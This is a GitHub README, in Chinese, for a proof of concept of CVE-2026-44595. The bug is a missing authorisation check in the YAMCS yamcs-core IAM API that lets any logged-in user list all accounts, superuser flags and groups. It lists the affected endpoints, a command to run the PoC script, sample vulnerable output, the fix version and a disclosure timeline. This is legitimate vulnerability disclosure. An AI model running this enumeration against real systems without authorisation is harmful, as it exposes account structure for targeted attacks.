ex-cal1bur/CVE-2026-44595
GitHub: ex-cal1bur/CVE-2026-44595
针对 YAMCS yamcs-core IAM API 未授权用户枚举漏洞(CVE-2026-44595)的概念验证与漏洞分析报告。
Stars: 0 | Forks: 0
# CVE-2026-44595 — YAMCS 通过 IAM API 的未授权用户枚举
## 摘要
`yamcs-core` 中的 IAM API 端点(`listUsers`、`getUser`、`listGroups`、`getGroup`)未强制执行所需的 `SystemPrivilege.ControlAccess` 检查。任何已认证的用户——即使是没有任何权限的用户——都可以枚举所有用户账户、超级用户状态和组成员身份。
| 字段 | 值 |
|-------|-------|
| **CVE** | CVE-2026-44595 |
| **严重程度** | MEDIUM (CVSS 4.3) |
| **CWE** | CWE-862: 缺失授权 |
| **受影响版本** | yamcs-core < 5.12.7 |
| **修复版本** | yamcs-core 5.12.7 |
| **公告** | [GHSA-p2rj-mrmc-9w29](https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29) |
## 漏洞详情
以下端点缺失 `SystemPrivilege.ControlAccess` 授权检查:
- `GET /api/iam/users` — 列出所有用户
- `GET /api/iam/users/{name}` — 获取用户详情
- `GET /api/iam/groups` — 列出所有组
- `GET /api/iam/groups/{name}` — 获取组详情
低权限用户可以调用这些端点并获取所有用户名、超级用户标志、组成员身份和身份提供商信息。
## 概念验证
```
pip install requests
python3 poc.py http://localhost:8090 testuser testpassword
```
易受攻击实例上的预期输出:
```
[2] Listing ALL users (IAM endpoint)...
Status: HTTP 200
[!!!] VULNERABLE: 3 users enumerated
-> admin [SUPERUSER]
-> operator [regular]
-> testuser [regular]
```
## 影响
拥有任何有效账户的攻击者都可以映射出 YAMCS 实例的整个用户结构——识别超级用户账户以进行定向攻击,枚举操作员账户,并了解基于组的访问控制。
## 修复
升级至 `yamcs-core >= 5.12.7`。
## 时间线
| 日期 | 事件 |
|------|-------|
| 2026-05 | 报告漏洞 |
| 2026-05-27 | 在 yamcs-core 5.12.7 中发布修复 |
| 2026-05-27 | 发布公开公告 |
## 研究员
**Daniel Miranda Barcelona (Excal1bur)**
- GitHub: [https://github.com/ex-cal1bur](https://github.com/ex-cal1bur)
- LinkedIn: [https://linkedin.com/in/daniel-miranda-barcelona](https://linkedin.com/in/daniel-miranda-barcelona)
- 博客: [https://thedumpster.es](https://thedumpster.es)
标签:Maven, PoC, Python, 信息泄露, 无后门, 暴力破解, 权限绕过, 漏洞验证, 逆向工具